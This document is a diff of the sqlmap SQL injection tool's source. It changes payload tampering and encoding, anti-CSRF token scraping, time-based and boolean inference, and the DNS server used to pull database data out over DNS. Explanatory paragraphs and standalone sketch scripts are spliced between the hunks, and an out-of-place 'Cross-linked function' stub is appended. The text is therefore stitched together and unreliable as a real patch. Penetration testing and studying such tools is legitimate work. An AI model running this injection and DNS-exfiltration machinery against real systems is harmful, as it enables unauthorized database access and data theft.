+ elif "NTLM" in tbMsg:
+ warnMsg = "there has been a problem with NTLM authentication"
elif "BadStatusLine" in tbMsg:
warnMsg = "connection dropped or unknown HTTP "
- warnMsg += "status code received. Try to force the HTTP User-Agent "
+ warnMsg += "status code received"
- warnMsg += "header with option '--user-agent' or switch '--random-agent'"
+ if not conf.agent and not conf.randomAgent:
+ warnMsg += ". Try to force the HTTP User-Agent "
+ warnMsg += "header with option '--user-agent' or switch '--random-agent'"
elif "IncompleteRead" in tbMsg:
warnMsg = "there was an incomplete read error while retrieving data "
warnMsg += "from the target URL"
+ elif "Handshake status" in tbMsg:
+ status = re.search("Handshake status ([\d]{3})", tbMsg)
+ errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
+ raise SqlmapConnectionException(errMsg)
else:
warnMsg = "unable to connect to the target URL"

@@ -553,7 +626,11 @@ class Connect(object):
raise SqlmapConnectionException(warnMsg)

finally:
- page = page if isinstance(page, unicode) else getUnicode(page)
+ if not isinstance(page, unicode):
+ if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
+ page = unicode(page, errors="ignore")
+ else:
+ page = getUnicode(page)
socket.setdefaulttimeout(conf.timeout)

processResponse(page, responseHeaders)

@@ -561,7 +638,13 @@ class Connect(object):
if conn and getattr(conn, "redurl", None):
_ = urlparse.urlsplit(conn.redurl)
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
- requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_), requestMsg, 1)
+ requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1)

+ if kb.resendPostOnRedirect is False:
+ requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
+ requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
+ requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)

responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
else:
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)

@@ -602,24 +685,26 @@ class Connect(object):
pageLength = None
uri = None
code = None
- urlEncodePost = None

if not place:
place = kb.injection.place or PLACE.GET

+ if not auxHeaders:
+ auxHeaders = {}

raise404 = place != PLACE.URI if raise404 is None else raise404
+ method = method or conf.method

value = agent.adjustLateValues(value)
payload = agent.extractPayload(value)
threadData = getCurrentThreadData()

if conf.httpHeaders:
- headers = dict(conf.httpHeaders)
+ headers = OrderedDict(conf.httpHeaders)
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
- urlEncodePost = contentType and "urlencoded" in contentType or contentType is None

- if (kb.postHint or conf.skipUrlEncode) and urlEncodePost:
+ if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
- urlEncodePost = False
+ kb.postUrlEncode = False
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
@@ -627,7 +712,13 @@ class Connect(object):
if payload:
if kb.tamperFunctions:
for function in kb.tamperFunctions:
- payload = function(payload=payload, headers=auxHeaders)
+ try:
+ payload = function(payload=payload, headers=auxHeaders)
+ except Exception, ex:
+ errMsg = "error occurred while running tamper "
+ errMsg += "function '%s' ('%s')" % (function.func_name, ex)
+ raise SqlmapGenericException(errMsg)

if not isinstance(payload, basestring):
errMsg = "tamper function '%s' returns " % function.func_name
errMsg += "invalid payload type ('%s')" % type(payload)

@@ -637,7 +728,7 @@ class Connect(object):

logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))

- if place == PLACE.CUSTOM_POST:
+ if place == PLACE.CUSTOM_POST and kb.postHint:
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
# payloads in SOAP/XML should have chars > and < replaced
# with their HTML encoded counterparts

@@ -647,11 +738,18 @@ class Connect(object):
payload = json.dumps(payload[1:-1])
else:
payload = json.dumps(payload)[1:-1]
+ elif kb.postHint == POST_HINT.JSON_LIKE:
+ payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
+ if payload.startswith('"') and payload.endswith('"'):
+ payload = json.dumps(payload[1:-1])
+ else:
+ payload = json.dumps(payload)[1:-1]
+ payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
value = agent.replacePayload(value, payload)
else:
- # GET, POST, URI and Cookie payload needs to be throughly URL encoded
+ # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
- if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST,) and urlEncodePost:
+ if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
- payload = urlencode(payload, '%', False, place != PLACE.URI)
+ payload = urlencode(payload, '%', False, place != PLACE.URI)  # spaceplus is handled down below
value = agent.replacePayload(value, payload)

if conf.hpp:
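The JSON_LIKE branch added above swaps quote styles through a temporary marker so that single-quoted ("JSON like") bodies survive JSON escaping. A small self-contained sketch of that round trip, where REPLACEMENT_MARKER only stands in for sqlmap's internal constant:

    # Swap quotes, JSON-escape, swap back: mirrors the JSON_LIKE handling above.
    import json

    REPLACEMENT_MARKER = "\x00"  # assumption: a character that never appears in the payload

    def escape_json_like(payload):
        payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
        if payload.startswith('"') and payload.endswith('"'):
            payload = json.dumps(payload[1:-1])
        else:
            payload = json.dumps(payload)[1:-1]
        return payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')

    print(escape_json_like("foo'bar\"baz"))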
@@ -715,56 +813,160 @@ class Connect(object):
uri = conf.url

if value and place == PLACE.CUSTOM_HEADER:
- if not auxHeaders:
- auxHeaders = {}
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]

+ if conf.csrfToken:
+ def _adjustParameter(paramString, parameter, newValue):
+ retVal = paramString
+ match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
+ if match:
+ origValue = match.group("value")
+ retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
+ return retVal

+ page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
+ match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
+ token = (match.group(2) or match.group(3) or match.group(4)) if match else None

+ if not token:
+ if conf.csrfUrl != conf.url and code == httplib.OK:
+ if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
+ token = page

+ if not token and any(_.name == conf.csrfToken for _ in conf.cj):
+ for _ in conf.cj:
+ if _.name == conf.csrfToken:
+ token = _.value
+ if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
+ if post:
+ post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+ elif get:
+ get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+ else:
+ get = "%s=%s" % (conf.csrfToken, token)
+ break

+ if not token:
+ errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
+ if not conf.csrfUrl:
+ errMsg += ". You can try to rerun by providing "
+ errMsg += "a valid value for option '--csrf-url'"
+ raise SqlmapTokenException, errMsg

+ if token:
+ for place in (PLACE.GET, PLACE.POST):
+ if place in conf.parameters:
+ if place == PLACE.GET and get:
+ get = _adjustParameter(get, conf.csrfToken, token)
+ elif place == PLACE.POST and post:
+ post = _adjustParameter(post, conf.csrfToken, token)

+ for i in xrange(len(conf.httpHeaders)):
+ if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
+ conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)

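The block above pulls the anti-CSRF token out of a hidden input field on a freshly fetched page and re-appends it to the request parameters. A minimal sketch of the extraction step only, using made-up HTML and a made-up token name:

    # Regex-based anti-CSRF token extraction, as in the hunk above; the page
    # content and token name below are purely illustrative.
    import re

    page = '<form><input type="hidden" name="csrfmiddlewaretoken" value="deadbeef1234"></form>'
    token_name = "csrfmiddlewaretoken"

    match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(token_name), page or "")
    token = (match.group(2) or match.group(3) or match.group(4)) if match else None

    get = "id=1"
    if token:
        get = "%s&%s=%s" % (get, token_name, token)
    print(get)  # id=1&csrfmiddlewaretoken=deadbeef1234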
if conf.rParam:
def _randomizeParameter(paramString, randomParameter):
retVal = paramString
- match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
+ match = re.search(r"(\A|\b)%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
if match:
origValue = match.group("value")
- retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
+ retVal = re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
return retVal

for randomParameter in conf.rParam:
- for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+ for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST):
if item in conf.parameters:
if item == PLACE.GET and get:
get = _randomizeParameter(get, randomParameter)
- elif item == PLACE.POST and post:
+ elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post:
post = _randomizeParameter(post, randomParameter)
elif item == PLACE.COOKIE and cookie:
cookie = _randomizeParameter(cookie, randomParameter)
+ elif item == PLACE.URI and uri:
+ uri = _randomizeParameter(uri, randomParameter)

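The --randomize handling above anchors the substitution with (\A|\b) and re.escape() so that only the chosen parameter is rewritten, not a parameter whose name merely ends with the same string. A small sketch with a toy value randomizer (randomize_parameter_value is a stand-in, not sqlmap's helper):

    import random
    import re
    import string

    def randomize_parameter_value(value):
        # toy stand-in: keep the length and rough character class of the original value
        charset = string.digits if value.isdigit() else string.ascii_letters
        return "".join(random.choice(charset) for _ in value)

    def randomize_parameter(param_string, random_parameter):
        match = re.search(r"(\A|\b)%s=(?P<value>[^&;]+)" % re.escape(random_parameter), param_string)
        if not match:
            return param_string
        new_value = randomize_parameter_value(match.group("value"))
        return re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(random_parameter), "%s=%s" % (random_parameter, new_value), param_string)

    print(randomize_parameter("id=1&token=abc123", "token"))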
if conf.evalCode:
- delimiter = conf.pDel or DEFAULT_GET_POST_DELIMITER
+ delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
- variables = {}
+ variables = {"uri": uri}
originals = {}
+ keywords = keyword.kwlist

- for item in filter(None, (get, post)):
+ for item in filter(None, (get, post if not kb.postHint else None)):
for part in item.split(delimiter):
if '=' in part:
name, value = part.split('=', 1)
+ name = re.sub(r"[^\w]", "", name.strip())
+ if name in keywords:
+ name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
- evaluateCode("%s=%s" % (name, repr(value)), variables)
+ variables[name] = value

+ if cookie:
+ for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
+ if '=' in part:
+ name, value = part.split('=', 1)
+ name = re.sub(r"[^\w]", "", name.strip())
+ if name in keywords:
+ name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
+ value = urldecode(value, convall=True)
+ variables[name] = value

+ while True:
+ try:
+ compiler.parse(conf.evalCode.replace(';', '\n'))
+ except SyntaxError, ex:
+ original = replacement = ex.text.strip()
+ for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
+ if _ in keywords:
+ replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
+ break
+ if original == replacement:
+ conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
+ break
+ else:
+ conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
+ else:
+ break

originals.update(variables)
evaluateCode(conf.evalCode, variables)

+ for variable in variables.keys():
+ if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
+ value = variables[variable]
+ del variables[variable]
+ variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value

+ uri = variables["uri"]

for name, value in variables.items():
if name != "__builtins__" and originals.get(name, "") != value:
if isinstance(value, (basestring, int)):
+ found = False
value = unicode(value)
- if '%s=' % name in (get or ""):
- get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get)
+ regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
- elif '%s=' % name in (post or ""):
+ if re.search(regex, (get or "")):
- post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post)
+ found = True
- elif post is not None:
+ get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
- post += "%s%s=%s" % (delimiter, name, value)
- else:
+ if re.search(regex, (post or "")):
- get += "%s%s=%s" % (delimiter, name, value)
+ found = True
+ post = re.sub(regex, "\g<1>%s\g<3>" % value, post)

+ regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
+ if re.search(regex, (cookie or "")):
+ found = True
+ cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie)

+ if not found:
+ if post is not None:
+ post += "%s%s=%s" % (delimiter, name, value)
+ elif get is not None:
+ get += "%s%s=%s" % (delimiter, name, value)
+ elif cookie is not None:
+ cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value)

if not conf.skipUrlEncode:
get = urlencode(get, limit=True)
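The --eval changes above rename request parameters that collide with Python keywords before the user snippet is evaluated, then rename them back when the values are written into the request. A simplified sketch of the idea; the real patch rewrites the snippet automatically when it fails to parse, while here the suffixed name is written out by hand, and EVALCODE_KEYWORD_SUFFIX is only an assumed stand-in:

    import keyword

    EVALCODE_KEYWORD_SUFFIX = "_eval"   # assumed placeholder for sqlmap's constant

    def evaluate_with_keyword_safety(eval_code, parameters):
        variables = {}
        for name, value in parameters.items():
            if name in keyword.kwlist:                      # e.g. "class" cannot be a variable name
                name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
            variables[name] = value
        exec(eval_code, variables)                          # user-supplied --eval snippet
        result = {}
        for name, value in variables.items():
            if name == "__builtins__":
                continue
            result[name.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value
        return result

    print(evaluate_with_keyword_safety(
        "class_eval = class_eval.upper(); id = int(id) + 1",
        {"id": "1", "class": "admin"}))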
@@ -772,7 +974,7 @@ class Connect(object):
if post is not None:
if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
post = getattr(post, UNENCODED_ORIGINAL_VALUE)
- elif urlEncodePost:
+ elif kb.postUrlEncode:
post = urlencode(post, spaceplus=kb.postSpaceToPlus)

if timeBasedCompare:

@@ -784,16 +986,20 @@ class Connect(object):
warnMsg += "time-based injections because of its high latency time"
singleTimeWarnMessage(warnMsg)

- warnMsg = "time-based comparison needs larger statistical "
+ warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X")
- warnMsg += "model. Making a few dummy requests, please wait.."
+ warnMsg += "larger statistical model, please wait"
- singleTimeWarnMessage(warnMsg)
+ dataToStdout(warnMsg)

while len(kb.responseTimes) < MIN_TIME_RESPONSES:
Connect.queryPage(content=True)
+ dataToStdout('.')

+ dataToStdout("\n")

elif not kb.testMode:
- warnMsg = "it is very important not to stress the network adapter's "
+ warnMsg = "it is very important not to stress the network adapter "
- warnMsg += "bandwidth during usage of time-based payloads"
+ warnMsg += "during usage of time-based payloads to prevent potential "
+ warnMsg += "errors "
singleTimeWarnMessage(warnMsg)

if not kb.laggingChecked:

@@ -804,17 +1010,19 @@ class Connect(object):
if deviation > WARN_TIME_STDEV:
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

- warnMsg = "there is considerable lagging "
+ warnMsg = "considerable lagging has been detected "
warnMsg += "in connection response(s). Please use as high "
warnMsg += "value for option '--time-sec' as possible (e.g. "
warnMsg += "10 or more)"
logger.critical(warnMsg)

+ if conf.safeFreq > 0:
- if conf.safUrl and conf.saFreq > 0:
kb.queryCounter += 1
- if kb.queryCounter % conf.saFreq == 0:
+ if kb.queryCounter % conf.safeFreq == 0:
- Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+ if conf.safeUrl:
+ Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+ elif kb.safeReq:
+ Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers)

start = time.time()

@@ -827,12 +1035,9 @@ class Connect(object):
if kb.nullConnection == NULLCONNECTION.HEAD:
method = HTTPMETHOD.HEAD
elif kb.nullConnection == NULLCONNECTION.RANGE:
- if not auxHeaders:
- auxHeaders = {}

auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"

- _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
+ _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))

if headers:
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:

@@ -844,7 +1049,7 @@ class Connect(object):

if not pageLength:
try:
- page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
+ page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
except MemoryError:
page, headers, code = None, None, None
warnMsg = "site returned insanely large response"

@@ -881,3 +1086,6 @@ class Connect(object):
return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
else:
return comparison(page, headers, code, getRatioValue, pageLength)

+ def setHTTPProxy():  # Cross-linked function
+ raise NotImplementedError

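The time-based warm-up above collects a small sample of baseline response times and warns when their spread is too large for reliable time-based comparisons. A rough sketch of that check; the constant names mirror sqlmap's but their values here are assumptions, and the timing function is a stand-in:

    import random

    MIN_TIME_RESPONSES = 30   # assumed sample size
    WARN_TIME_STDEV = 0.5     # assumed threshold, in seconds

    def measure_response_time():
        # stand-in for issuing and timing a real baseline request
        return 0.2 + random.random() * 0.1

    response_times = []
    while len(response_times) < MIN_TIME_RESPONSES:
        response_times.append(measure_response_time())

    mean = sum(response_times) / len(response_times)
    deviation = (sum((_ - mean) ** 2 for _ in response_times) / (len(response_times) - 1)) ** 0.5

    if deviation > WARN_TIME_STDEV:
        print("considerable lagging detected - use a higher '--time-sec' value")
    else:
        print("baseline deviation %.3fs looks stable enough" % deviation)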
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
- Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -33,7 +33,7 @@ def direct(query, content=True):
query = agent.adjustLateValues(query)
threadData = getCurrentThreadData()

- if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query:
+ if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper():
query = "%s FROM DUAL" % query

for sqlTitle, sqlStatements in SQL_STATEMENTS.items():

@@ -50,7 +50,7 @@ def direct(query, content=True):
output = hashDBRetrieve(query, True, True)
start = time.time()

- if not select and "EXEC " not in query:
+ if not select and "EXEC " not in query.upper():
_ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query):
output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None)

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
- Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -65,6 +65,7 @@ class DNSServer(object):
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(("", 53))
self._running = False
+ self._initialized = False

def pop(self, prefix=None, suffix=None):
"""

@@ -91,6 +92,7 @@ class DNSServer(object):
def _():
try:
self._running = True
+ self._initialized = True

while True:
data, addr = self._socket.recvfrom(1024)

@@ -116,6 +118,9 @@ if __name__ == "__main__":
server = DNSServer()
server.run()

+ while not server._initialized:
+ time.sleep(0.1)

while server._running:
while True:
_ = server.pop()

@@ -1,14 +1,16 @@
#!/usr/bin/env python

"""
- Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import httplib
import socket
+ import sys
import urllib2

+ from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException

@@ -19,7 +21,7 @@ try:
except ImportError:
pass

- _protocols = [ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1]
+ _protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))

class HTTPSConnection(httplib.HTTPSConnection):
"""

@@ -41,20 +43,42 @@ class HTTPSConnection(httplib.HTTPSConnection):

success = False

- for protocol in _protocols:
+ if not kb.tlsSNI:
- try:
+ for protocol in _protocols:
- sock = create_sock()
+ try:
- _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
+ sock = create_sock()
- if _:
+ _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
- success = True
+ if _:
- self.sock = _
+ success = True
- _protocols.remove(protocol)
+ self.sock = _
- _protocols.insert(0, protocol)
+ _protocols.remove(protocol)
- break
+ _protocols.insert(0, protocol)
- else:
+ break
- sock.close()
+ else:
- except ssl.SSLError, errMsg:
+ sock.close()
- logger.debug("SSL connection error occured ('%s')" % errMsg)
+ except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+ self._tunnel_host = None
+ logger.debug("SSL connection error occurred ('%s')" % errMsg)

+ # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
+ # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
+ if not success and hasattr(ssl, "SSLContext"):
+ for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
+ try:
+ sock = create_sock()
+ context = ssl.SSLContext(protocol)
+ _ = context.wrap_socket(sock, do_handshake_on_connect=False, server_hostname=self.host)
+ if _:
+ kb.tlsSNI = success = True
+ self.sock = _
+ _protocols.remove(protocol)
+ _protocols.insert(0, protocol)
+ break
+ else:
+ sock.close()
+ except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+ self._tunnel_host = None
+ logger.debug("SSL connection error occurred ('%s')" % errMsg)

if not success:
raise SqlmapConnectionException("can't establish SSL connection")
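The fallback added above relies on ssl.SSLContext so that the hostname is sent via SNI during the TLS handshake, which plain ssl.wrap_socket() on older Python 2 builds never did. A bare sketch of an SNI-enabled connection; no certificate validation is performed and the hostname is illustrative:

    import socket
    import ssl

    def open_tls_socket_with_sni(host, port=443):
        # SSLContext.wrap_socket() accepts server_hostname, so the server sees
        # which virtual host is being requested during the handshake (SNI).
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)   # negotiate the best mutually supported protocol
        sock = socket.create_connection((host, port), timeout=10)
        return context.wrap_socket(sock, server_hostname=host)

    conn = open_tls_socket_with_sni("www.example.com")
    print(conn.version(), conn.cipher()[0])
    conn.close()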
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -38,6 +38,7 @@ from lib.core.enums import CHARSET_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import EXPECTED
|
from lib.core.enums import EXPECTED
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
|
from lib.core.exception import SqlmapConnectionException
|
||||||
from lib.core.exception import SqlmapNotVulnerableException
|
from lib.core.exception import SqlmapNotVulnerableException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
||||||
|
@ -55,7 +56,7 @@ from lib.techniques.union.use import unionUse
|
||||||
def _goDns(payload, expression):
|
def _goDns(payload, expression):
|
||||||
value = None
|
value = None
|
||||||
|
|
||||||
if conf.dnsName and kb.dnsTest is not False:
|
if conf.dnsName and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None:
|
||||||
if kb.dnsTest is None:
|
if kb.dnsTest is None:
|
||||||
dnsTest(payload)
|
dnsTest(payload)
|
||||||
|
|
||||||
|
@ -71,7 +72,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
|
||||||
|
|
||||||
value = _goDns(payload, expression)
|
value = _goDns(payload, expression)
|
||||||
|
|
||||||
if value:
|
if value is not None:
|
||||||
return value
|
return value
|
||||||
|
|
||||||
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
|
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
|
||||||
|
@ -83,7 +84,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
|
||||||
expression = "SELECT %s FROM (%s)" % (field, expression)
|
expression = "SELECT %s FROM (%s)" % (field, expression)
|
||||||
|
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
||||||
expression += " AS %s" % randomStr(lowercase=True)
|
expression += " AS %s" % randomStr(lowercase=True, seed=hash(expression))
|
||||||
|
|
||||||
if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','):
|
if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','):
|
||||||
nulledCastedField = agent.nullAndCastField(field)
|
nulledCastedField = agent.nullAndCastField(field)
|
||||||
|
@ -198,7 +199,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
|
||||||
if isNumPosStrValue(count):
|
if isNumPosStrValue(count):
|
||||||
count = int(count)
|
count = int(count)
|
||||||
|
|
||||||
if batch:
|
if batch or count == 1:
|
||||||
stopLimit = count
|
stopLimit = count
|
||||||
else:
|
else:
|
||||||
message = "the SQL query provided can return "
|
message = "the SQL query provided can return "
|
||||||
|
@ -286,11 +287,21 @@ def _goBooleanProxy(expression):
|
||||||
|
|
||||||
initTechnique(kb.technique)
|
initTechnique(kb.technique)
|
||||||
|
|
||||||
|
if conf.dnsName:
|
||||||
|
query = agent.prefixQuery(kb.injection.data[kb.technique].vector)
|
||||||
|
query = agent.suffixQuery(query)
|
||||||
|
payload = agent.payload(newValue=query)
|
||||||
|
output = _goDns(payload, expression)
|
||||||
|
|
||||||
|
if output is not None:
|
||||||
|
return output
|
||||||
|
|
||||||
vector = kb.injection.data[kb.technique].vector
|
vector = kb.injection.data[kb.technique].vector
|
||||||
vector = vector.replace("[INFERENCE]", expression)
